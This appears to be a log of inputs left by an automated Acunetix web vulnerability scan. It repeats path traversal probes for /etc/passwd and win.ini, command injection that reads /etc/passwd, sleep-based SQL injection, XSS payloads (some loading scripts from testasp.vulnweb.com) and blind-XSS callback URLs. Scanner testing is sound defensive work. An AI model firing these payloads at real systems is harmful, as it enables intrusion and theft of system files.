file:///etc/passwd

1

'"

1

YVawcq8B'))

1

comments/.

1

'&dir&'

1

/\../\../\../\../\../\../\../etc/passwd

1

<!--

1

1

1'"()&%<ScRiPt >prompt(945527)</ScRiPt>

1

WEB-INF/web.xml

1

1

'"()&%<ScRiPt >prompt(948380)</ScRiPt>

1

"&dir&"

1

1

WEB-INF\web.xml

1

1_902943

1

1

|dir

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

'|dir

1

1

"|dir

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

acu2710<s1﹥s2ʺs3ʹuca2710

1

1

windowswin.ini

1

acux6303z1z2abcxuca6303

1

1

................windowswin.ini

1

1

1<ScRiPt >prompt(939848)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<script>prompt(971399)</script>

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1<ScRiPt >prompt(906781)</ScRiPt>

1

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?983487></ScRiPt>

&cat /etc/passwd&

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

response.write(9101901*9383879)

1<ScRiPt >prompt(957080)</ScRiPt>

1

SomeCustomInjectedHeader:injected_by_wvs

1

'&cat /etc/passwd&'

'+response.write(9101901*9383879)+'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<video><source onerror="javascript:prompt(972905)">

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

"+response.write(9101901*9383879)+"

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(951045)"></g></svg>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

1

cat /etc/passwd

1

1

../../../../../../../../../../etc/passwd.jpg

WEB-INF/web.xml

1<div style=width:expression(prompt(923512))>

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

`cat /etc/passwd`

1

1

1<iframe src='data:text/html

1

1

WEB-INF\web.xml

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<body onload=prompt(950530)>

${100366+99114}

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

|cat /etc/passwd#

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(963678)>

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

-1

1

1<img src=xyz OnErRor=prompt(968492)>

1&n981698=v929798

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

)

'|'ld

1

-1)

1some_inexistent_file_with_long_name%00.jpg

1<img/src=">" onerror=alert(981919)>

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

!(()&&!|*|*|

"|"ld

-1))

1<ScRiPt%20>prompt(906182)</sCripT>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

.\./.\./.\./.\./.\./.\./etc/passwd

1

testasp.vulnweb.com

1&lt

B81ITZXU'

^(#$!@#$)(()))******

'"()

1

1

/etc/passwd

1

1

<img acu onmouseover=prompt(923785) //>

1

'

1

vEsnqAJZ')

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1<input autofocus onfocus=prompt(943789)>

1

1

1

"

ErAExXRN'))

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

<a href='http://www.acunetix.com'>website security</a>

1

1

1

1

................etc/passwd

||cat /etc/passwd

1

[url=http://www.acunetix.com]website security[/url]

-1

1

1

'

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1)

1_uxt1B <ScRiPt >prompt(959684)</ScRiPt>

&dir

1

1

"

1

http://hitwTBakXa3m9.bxss.me/

1

file:///etc/passwd

-1))

1

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}

1

1

1

'&dir&'

1

q4U62ion'

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

${@print(md5(acunetix_wvs_security_test))}\

/\../\../\../\../\../\../\../etc/passwd

1

G2HrO1EJ')

1

1

1

http://www.acunetix.tst

comments

1

ToSHBMMs'))

"&dir&"

1

WEB-INF/web.xml

1'"()&%<ScRiPt >prompt(915898)</ScRiPt>

'"

1

1

comments/.

1

'"()&%<ScRiPt >prompt(985966)</ScRiPt>

1

WEB-INF\web.xml

<!--

1

1

1

1_924276

../../../../../../../../../../windows/win.ini

1

1

|dir

1

1

1

1

1

'|dir

../../../../../../../../../../boot.ini

1

1

1

"|dir

1

../../../../../../../../../../windows/win.ini.jpg

1

1

windowswin.ini

1

1

1

acu4999<s1﹥s2ʺs3ʹuca4999

1

1

................windowswin.ini

1

acux1267z1z2abcxuca1267

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<ScRiPt >prompt(912073)</ScRiPt>

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1

1<script>prompt(921301)</script>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(943284)</ScRiPt>

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?904969></ScRiPt>

1

1

1

1

1<ScRiPt >prompt(929771)</ScRiPt>

WEB-INF/web.xml

response.write(9507205*9925003)

1

&cat /etc/passwd&

1

1<video><source onerror="javascript:prompt(945888)">

1

SomeCustomInjectedHeader:injected_by_wvs

'+response.write(9507205*9925003)+'

'&cat /etc/passwd&'

WEB-INF\web.xml

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(962300)"></g></svg>

SomeCustomInjectedHeader:injected_by_wvs

1

1

"+response.write(9507205*9925003)+"

"&cat /etc/passwd&"

1<div style=width:expression(prompt(950922))>

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

../../../../../../../../../../etc/passwd

1

1

cat /etc/passwd

1<iframe src='data:text/html

1

1

1

1<body onload=prompt(927577)>

`cat /etc/passwd`

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(950228)>

1

1

|cat /etc/passwd#

1

${100130+99297}

../../../../../../../../../../etc/passwd.jpg

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1<img src=xyz OnErRor=prompt(939581)>

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

'|'ld

1&n997749=v996682

1

1

1<img/src=">" onerror=alert(970092)>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1some_inexistent_file_with_long_name%00.jpg

)

1

-1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

"|"ld

1

1<ScRiPt%20>prompt(968001)</sCripT>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

-1

'"()

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

testasp.vulnweb.com

1

1&lt

^(#$!@#$)(()))******

-1)

1

1

.\./.\./.\./.\./.\./.\./etc/passwd

'

1

1

'

1

-1))

1

1

<img acu onmouseover=prompt(963770) //>

/etc/passwd

"

1

1

1

"

OudWRtW2'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1<input autofocus onfocus=prompt(985682)>

1

1

${@print(md5(acunetix_wvs_security_test))}

maW5cC3S')

1

1

1

||cat /etc/passwd

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

<a href='http://www.acunetix.com'>website security</a>

http://hitHwuoeuFnD6.bxss.me/

Xu4Xvjlj'))

${@print(md5(acunetix_wvs_security_test))}\

1

1

1

-1

acunetix_wvs_invalid_filename

&dir

1

[url=http://www.acunetix.com]website security[/url]

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

-1)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

comments

1

1_6GJkV <ScRiPt >prompt(966329)</ScRiPt>

'&dir&'

-1))

http://www.acunetix.tst

1

1

'"

comments

"&dir&"

b4wGBG3S'

1

1

comments/.

1'"()&%<ScRiPt >prompt(944441)</ScRiPt>

1

1

................etc/passwd

<!--

1

1

7sKkXY6T')

|dir

1

'"()&%<ScRiPt >prompt(932785)</ScRiPt>

1

1

1

cGZD4phl'))

1

1

1_960277

'|dir

1

1

1

file:///etc/passwd

1

"|dir

1

1

/\../\../\../\../\../\../\../etc/passwd

1

WEB-INF/web.xml

1

1

1

WEB-INF\web.xml

1

1

acu4519<s1﹥s2ʺs3ʹuca4519

../../../../../../../../../../windows/win.ini

1

acux1477z1z2abcxuca1477

1

1

../../../../../../../../../../boot.ini

1<ScRiPt >prompt(939772)</ScRiPt>

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1<script>prompt(951163)</script>

windowswin.ini

1

1

1

1<ScRiPt >prompt(937473)</ScRiPt>

................windowswin.ini

1

1

1

response.write(9786163*9155547)

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?994644></ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

&cat /etc/passwd&

1

1

'+response.write(9786163*9155547)+'

1

'&cat /etc/passwd&'

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1<ScRiPt >prompt(926800)</ScRiPt>

SomeCustomInjectedHeader:injected_by_wvs

1

"+response.write(9786163*9155547)+"

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<video><source onerror="javascript:prompt(996634)">

1

../../../../../../../../../../etc/passwd

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

cat /etc/passwd

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(983582)"></g></svg>

1

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

`cat /etc/passwd`

1

1

1

1

1<div style=width:expression(prompt(986771))>

../../../../../../../../../../etc/passwd.jpg

${99580+99023}

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

|cat /etc/passwd#

WEB-INF/web.xml

1<iframe src='data:text/html

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1

1

1&n909099=v914445

)

1some_inexistent_file_with_long_name%00.jpg

WEB-INF\web.xml

'|'ld

1

1<body onload=prompt(973545)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

!(()&&!|*|*|

-1)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

1

"|"ld

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(935993)>

'"()

/../..//../..//../..//../..//../..//etc/passwd.jpg

^(#$!@#$)(()))******

testasp.vulnweb.com

-1))

1

1

1

1<img src=xyz OnErRor=prompt(988051)>

1

bkcOjKj7'

1

.\./.\./.\./.\./.\./.\./etc/passwd

'

1

1

1

1<img/src=">" onerror=alert(974306)>

1

FKEBsyqY')

'

1

1

"

http://testasp.vulnweb.com/t/xss.html?%00.jpg

/etc/passwd

1<ScRiPt%20>prompt(950321)</sCripT>

1

c2F95l19'))

1

"

1&lt

${@print(md5(acunetix_wvs_security_test))}

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

-1

1

<img acu onmouseover=prompt(999669) //>

${@print(md5(acunetix_wvs_security_test))}\

1

http://hitApLZPeAzpo.bxss.me/

-1)

1

||cat /etc/passwd

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

acunetix_wvs_invalid_filename

1<input autofocus onfocus=prompt(988333)>

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

-1))

1

1

&dir

comments

<a href='http://www.acunetix.com'>website security</a>

1

http://www.acunetix.tst

................etc/passwd

'"

nhERCvGc'

[url=http://www.acunetix.com]website security[/url]

1

comments

1'"()&%<ScRiPt >prompt(976569)</ScRiPt>

1

'&dir&'

<!--

1_bKVEK <ScRiPt >prompt(904174)</ScRiPt>

1

nbsuhKrO')

comments/.

1

'"()&%<ScRiPt >prompt(937710)</ScRiPt>

1

file:///etc/passwd

bLlG3SGQ'))

1

"&dir&"

1

1

1_994353

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

|dir

1

1

1

WEB-INF/web.xml

'|dir

1

1

WEB-INF\web.xml

1

1

"|dir

1

../../../../../../../../../../windows/win.ini

1

1

1

1

../../../../../../../../../../boot.ini

acu9896<s1﹥s2ʺs3ʹuca9896

1

1

../../../../../../../../../../windows/win.ini.jpg

1

acux9679z1z2abcxuca9679

1

1

1

windowswin.ini

1

1<ScRiPt >prompt(935166)</ScRiPt>

1

................windowswin.ini

1

1<script>prompt(921118)</script>

1

1

1<ScRiPt >prompt(966009)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?921646></ScRiPt>

1

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1<ScRiPt >prompt(969259)</ScRiPt>

1

1

1

1<video><source onerror="javascript:prompt(938888)">

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(919654)"></g></svg>

1

1

response.write(9413472*9576735)

1

1<div style=width:expression(prompt(959449))>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

&cat /etc/passwd&

1<iframe src='data:text/html

'+response.write(9413472*9576735)+'

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(932962)>

1

1

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

1

"+response.write(9413472*9576735)+"

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(954491)>

1

WEB-INF/web.xml

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

"&cat /etc/passwd&"

1<img src=xyz OnErRor=prompt(905953)>

SomeCustomInjectedHeader:injected_by_wvs

1

cat /etc/passwd

1

../../../../../../../../../../etc/passwd.jpg

WEB-INF\web.xml

1

1

1<img/src=">" onerror=alert(947714)>

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

`cat /etc/passwd`

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1<ScRiPt%20>prompt(958043)</sCripT>

1

1

1

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

|cat /etc/passwd#

1

1

${99841+99610}

1

1&lt

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1&n925716=v989939

1

1

<img acu onmouseover=prompt(978166) //>

'|'ld

)

1some_inexistent_file_with_long_name%00.jpg

1

-1)

.\./.\./.\./.\./.\./.\./etc/passwd

1

"|"ld

1

1<input autofocus onfocus=prompt(988635)>

1

-1))

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

'"()

/etc/passwd

1

<a href='http://www.acunetix.com'>website security</a>

1

QWh7yMUJ'

^(#$!@#$)(()))******

testasp.vulnweb.com

1

'

'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

[url=http://www.acunetix.com]website security[/url]

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

xjgFjgu6')

1

1

1

"

"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1_RXRH4 <ScRiPt >prompt(999120)</ScRiPt>

1

wSUCL5mP'))

1

1

1

${@print(md5(acunetix_wvs_security_test))}

||cat /etc/passwd

................etc/passwd

http://hitPq1oE7nj63.bxss.me/

1

-1

1

1

1

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}\

&dir

1

-1)

1

comments

1

1

1

'&dir&'

1

file:///etc/passwd

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

http://www.acunetix.tst

-1))

1

comments/.

'"

1

"&dir&"

1

/\../\../\../\../\../\../\../etc/passwd

s8iGT3Co'

1'"()&%<ScRiPt >prompt(973785)</ScRiPt>

1

1

1

<!--

1

upa5B2Pb')

'"()&%<ScRiPt >prompt(973015)</ScRiPt>

WEB-INF/web.xml

|dir

RQDb0m7b'))

1

1

1

1

1

1

WEB-INF\web.xml

1

'|dir

1_912125

1

1

1

../../../../../../../../../../windows/win.ini

"|dir

1

1

1

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

windowswin.ini

1

acu10553<s1﹥s2ʺs3ʹuca10553

1

................windowswin.ini

1

1

acux10701z1z2abcxuca10701

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(908862)</ScRiPt>

1

1<script>prompt(951253)</script>

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1

1<ScRiPt >prompt(960379)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?937015></ScRiPt>

1

1

1

1

response.write(9906739*9848978)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt >prompt(963472)</ScRiPt>

1

1

'+response.write(9906739*9848978)+'

1

1<video><source onerror="javascript:prompt(961596)">

1

1

"+response.write(9906739*9848978)+"

1

&cat /etc/passwd&

1

WEB-INF/web.xml

1

SomeCustomInjectedHeader:injected_by_wvs

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(953750)"></g></svg>

1

../../../../../../../../../../etc/passwd

1

'&cat /etc/passwd&'

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1<div style=width:expression(prompt(980395))>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

1

1<iframe src='data:text/html

cat /etc/passwd

../../../../../../../../../../etc/passwd.jpg

1

-1

1

${100107+100495}

1

1

1

1<body onload=prompt(972460)>

1

-1)

`cat /etc/passwd`

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1&n968290=v908965

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

|cat /etc/passwd#

1

-1))

)

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(963035)>

1

1some_inexistent_file_with_long_name%00.jpg

1<img src=xyz OnErRor=prompt(994933)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

'|'ld

1

JeAfOGkl'

!(()&&!|*|*|

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'"()

1

1<img/src=">" onerror=alert(979343)>

^(#$!@#$)(()))******

/../..//../..//../..//../..//../..//etc/passwd.jpg

I8u4f3CB')

"|"ld

1

z8xAcjSq'))

testasp.vulnweb.com

1

1<ScRiPt%20>prompt(913739)</sCripT>

'

1

.\./.\./.\./.\./.\./.\./etc/passwd

1

-1

1

1&lt

1

1

"

'

1

/etc/passwd

1

-1)

<img acu onmouseover=prompt(939821) //>

1

${@print(md5(acunetix_wvs_security_test))}

"

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

1<input autofocus onfocus=prompt(917995)>

-1))

${@print(md5(acunetix_wvs_security_test))}\

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

||cat /etc/passwd

1

1

1

1

MPNdN3fa'

&dir

http://hitmqdGLX60Cb.bxss.me/

1

<a href='http://www.acunetix.com'>website security</a>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

acunetix_wvs_invalid_filename

1

mCzkQbye')

'&dir&'

1

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

................etc/passwd

comments

1

OdwjKSv8'))

1

"&dir&"

1

http://www.acunetix.tst

1

comments

1

1

|dir

1

1

[url=http://www.acunetix.com]website security[/url]

comments/.

'"

file:///etc/passwd

1'"()&%<ScRiPt >prompt(973260)</ScRiPt>

1

1_QATXw <ScRiPt >prompt(950100)</ScRiPt>

'|dir

1

<!--

1

1

'"()&%<ScRiPt >prompt(946497)</ScRiPt>

1

/\../\../\../\../\../\../\../etc/passwd

1

1

"|dir

1

1_925967

1

1

WEB-INF/web.xml

1

1

1

1

WEB-INF\web.xml

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

1

../../../../../../../../../../boot.ini

acu2105<s1﹥s2ʺs3ʹuca2105

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

acux2667z1z2abcxuca2667

1

1

windowswin.ini

1

1<ScRiPt >prompt(984631)</ScRiPt>

................windowswin.ini

1

1

1

1<script>prompt(969012)</script>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<ScRiPt >prompt(957493)</ScRiPt>

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?920400></ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<ScRiPt >prompt(963248)</ScRiPt>

1

1

1

response.write(9444113*9056699)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<video><source onerror="javascript:prompt(933374)">

1

&cat /etc/passwd&

'+response.write(9444113*9056699)+'

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(963497)"></g></svg>

"+response.write(9444113*9056699)+"

'&cat /etc/passwd&'

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF/web.xml

1<div style=width:expression(prompt(939499))>

1

"&cat /etc/passwd&"

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

1<iframe src='data:text/html

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

WEB-INF\web.xml

cat /etc/passwd

1

1<body onload=prompt(962838)>

../../../../../../../../../../etc/passwd.jpg

1

1

1

`cat /etc/passwd`

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(995384)>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

|cat /etc/passwd#

1

1

-1

1

${99289+100157}

1<img src=xyz OnErRor=prompt(987326)>

1

1&n922242=v938619

'|'ld

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1)

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<img/src=">" onerror=alert(993548)>

"|"ld

1some_inexistent_file_with_long_name%00.jpg

)

1

-1))

1

'"()

1<ScRiPt%20>prompt(998215)</sCripT>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

.\./.\./.\./.\./.\./.\./etc/passwd

!(()&&!|*|*|

1

D8vbhQ43'

1

'

1

'

1&lt

testasp.vulnweb.com

/etc/passwd

KAuzZHTS')

^(#$!@#$)(()))******

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

"

1

<img acu onmouseover=prompt(989492) //>

"

BPcVZy6p'))

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

${@print(md5(acunetix_wvs_security_test))}

1<input autofocus onfocus=prompt(997073)>

1

-1

1

||cat /etc/passwd

1

acunetix_wvs_invalid_filename

http://hitcfK8LiwSvK.bxss.me/

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

<a href='http://www.acunetix.com'>website security</a>

-1)

1

1

................etc/passwd

1

&dir

comments

1

-1))

1

1

[url=http://www.acunetix.com]website security[/url]

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

HZnlL8Wn'

http://www.acunetix.tst

'&dir&'

comments

1

1

file:///etc/passwd

1_5mwyd <ScRiPt >prompt(908669)</ScRiPt>

1

0vbZrtXD')

"&dir&"

comments/.

'"

1

/\../\../\../\../\../\../\../etc/passwd

1

nHgBuFCi'))

1'"()&%<ScRiPt >prompt(971147)</ScRiPt>

1

1

1

|dir

<!--

1

1

WEB-INF/web.xml

1

1

'"()&%<ScRiPt >prompt(989582)</ScRiPt>

1

1

'|dir

1

1

1

WEB-INF\web.xml

1

1_943610

"|dir

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

1

../../../../../../../../../../windows/win.ini.jpg

1

acu10809<s1﹥s2ʺs3ʹuca10809

1

acux4007z1z2abcxuca4007

windowswin.ini

1

1<ScRiPt >prompt(939737)</ScRiPt>

1

................windowswin.ini

1

1

1<script>prompt(942613)</script>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(935781)</ScRiPt>

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?940584></ScRiPt>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(965045)</ScRiPt>

1

1

1<video><source onerror="javascript:prompt(932265)">

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(961097)"></g></svg>

1

response.write(9154309*9641286)

1

1

1

1<div style=width:expression(prompt(935965))>

'+response.write(9154309*9641286)+'

1<iframe src='data:text/html

WEB-INF/web.xml

&cat /etc/passwd&

1

1

"+response.write(9154309*9641286)+"

1<body onload=prompt(959852)>

SomeCustomInjectedHeader:injected_by_wvs

1

WEB-INF\web.xml

'&cat /etc/passwd&'

1

1

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(998705)>

"&cat /etc/passwd&"

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

1

1

cat /etc/passwd

1<img src=xyz OnErRor=prompt(917813)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

1

1

1

1<img/src=">" onerror=alert(958785)>

1

../../../../../../../../../../etc/passwd.jpg

`cat /etc/passwd`

1

-1

1

1

1<ScRiPt%20>prompt(941512)</sCripT>

1

|cat /etc/passwd#

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

${99670+99195}

-1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&lt

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1&n961635=v979779

'|'ld

1

1

-1)

1some_inexistent_file_with_long_name%00.jpg

<img acu onmouseover=prompt(912124) //>

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

"|"ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

)

-1))

1

1

1<input autofocus onfocus=prompt(935865)>

1

testasp.vulnweb.com

1

